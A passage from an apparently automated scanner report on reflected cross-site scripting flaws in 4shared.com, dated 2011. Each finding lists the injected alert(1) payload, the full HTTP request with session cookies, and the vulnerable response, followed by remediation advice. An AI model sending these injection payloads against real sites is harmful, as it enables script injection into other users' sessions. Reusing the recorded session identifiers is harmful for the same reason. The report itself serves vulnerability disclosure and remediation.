<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/rest/account22f91"-alert(1)-"6aa4867a991/freeSpace";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.108. http://www.4shared.com/rest/account/freeSpace [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /rest/account/freeSpace

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7367"-alert(1)-"01af3631dea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rest/account/freeSpacea7367"-alert(1)-"01af3631dea?dirId=-1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /rest/account/freeSpacea7367&quot;-alert(1)-&quot;01af3631dea
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:57:49 GMT
Content-Length: 38847


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/rest/account/freeSpacea7367"-alert(1)-"01af3631dea";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.109. http://www.4shared.com/rest/account/freeSpace [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /rest/account/freeSpace

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f142c'-alert(1)-'6f555e154b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rest/account/freeSpacef142c'-alert(1)-'6f555e154b4?dirId=-1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /rest/account/freeSpacef142c'-alert(1)-'6f555e154b4
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:57:51 GMT
Content-Length: 38670


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
x == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/rest/account/freeSpacef142c'-alert(1)-'6f555e154b4',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.110. http://www.4shared.com/signup.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /signup.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7998'-alert(1)-'1cd31803981 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /signup.jspa7998'-alert(1)-'1cd31803981 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /signup.jspa7998'-alert(1)-'1cd31803981
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:27 GMT
Content-Length: 38768


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
peof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/signup.jspa7998'-alert(1)-'1cd31803981',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.111. http://www.4shared.com/signup.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /signup.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7be2b"-alert(1)-"5999fd25a14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /signup.jsp7be2b"-alert(1)-"5999fd25a14 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /signup.jsp7be2b&quot;-alert(1)-&quot;5999fd25a14
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:20 GMT
Content-Length: 38593


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/signup.jsp7be2b"-alert(1)-"5999fd25a14";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.112. http://www.4shared.com/sync/sync.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /sync/sync.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83445'-alert(1)-'ce4aca1c713 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sync83445'-alert(1)-'ce4aca1c713/sync.css?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /sync83445'-alert(1)-'ce4aca1c713/sync.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:28 GMT
Content-Length: 38612


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/sync83445'-alert(1)-'ce4aca1c713/sync.css',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

func
...[SNIP]...

2.113. http://www.4shared.com/sync/sync.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /sync/sync.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36fee"-alert(1)-"c1e9c427056 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sync36fee"-alert(1)-"c1e9c427056/sync.css?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /sync36fee&quot;-alert(1)-&quot;c1e9c427056/sync.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:25 GMT
Content-Length: 38781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/sync36fee"-alert(1)-"c1e9c427056/sync.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.114. http://www.4shared.com/sync/sync.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /sync/sync.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3aa8'-alert(1)-'ea175ddf358 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sync/sync.cssa3aa8'-alert(1)-'ea175ddf358?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /sync/sync.cssa3aa8'-alert(1)-'ea175ddf358
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:47 GMT
Content-Length: 38609


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
f loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/sync/sync.cssa3aa8'-alert(1)-'ea175ddf358',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.115. http://www.4shared.com/sync/sync.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /sync/sync.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e761"-alert(1)-"3c04ee6b149 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sync/sync.css5e761"-alert(1)-"3c04ee6b149?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /sync/sync.css5e761&quot;-alert(1)-&quot;3c04ee6b149
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:44 GMT
Content-Length: 38782


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/sync/sync.css5e761"-alert(1)-"3c04ee6b149";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.116. http://www.4shared.com/icons/16x16/doc.gif [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/doc.gif

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 5cca2--><script>alert(1)</script>aa8a61c2b44 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /icons/16x16/doc.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=5cca2--><script>alert(1)</script>aa8a61c2b44
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16/doc.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:25 GMT
Content-Length: 38751


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.google.com/search?hl=en&q=5cca2--><script>alert(1)</script>aa8a61c2b44-->
...[SNIP]...

2.117. http://www.4shared.com/icons/16x16/pdf.gif [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/pdf.gif

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 97791--><script>alert(1)</script>1f93d87de1c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /icons/16x16/pdf.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=97791--><script>alert(1)</script>1f93d87de1c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16/pdf.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:11 GMT
Content-Length: 38575


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.google.com/search?hl=en&q=97791--><script>alert(1)</script>1f93d87de1c-->
...[SNIP]...

2.118. http://www.4shared.com/icons/16x16/png.gif [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/png.gif

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 8dc37--><script>alert(1)</script>e7e0f649100 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /icons/16x16/png.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=8dc37--><script>alert(1)</script>e7e0f649100
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 404 /icons/16x16/png.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:58:04 GMT
Content-Length: 38572


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.google.com/search?hl=en&q=8dc37--><script>alert(1)</script>e7e0f649100-->
...[SNIP]...

2.119. http://www.4shared.com/images/asf-logo.gif [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/asf-logo.gif

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 8fbe7--><script>alert(1)</script>80d560929b8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/asf-logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com
Referer: http://www.google.com/search?hl=en&q=8fbe7--><script>alert(1)</script>80d560929b8

Response

HTTP/1.1 404 /images/asf-logo.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:20 GMT
Content-Length: 38567


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.google.com/search?hl=en&q=8fbe7--><script>alert(1)</script>80d560929b8-->
...[SNIP]...

2.120. http://www.4shared.com/images/tomcat.gif [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/tomcat.gif

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload c37a1--><script>alert(1)</script>ca97132b045 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/tomcat.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com
Referer: http://www.google.com/search?hl=en&q=c37a1--><script>alert(1)</script>ca97132b045

Response

HTTP/1.1 404 /images/tomcat.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:20 GMT
Content-Length: 38558


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.google.com/search?hl=en&q=c37a1--><script>alert(1)</script>ca97132b045-->
...[SNIP]...

2.121. http://www.4shared.com/images/void.gif [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/void.gif

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload c6511--><script>alert(1)</script>fe3c2ad2eba was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/void.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
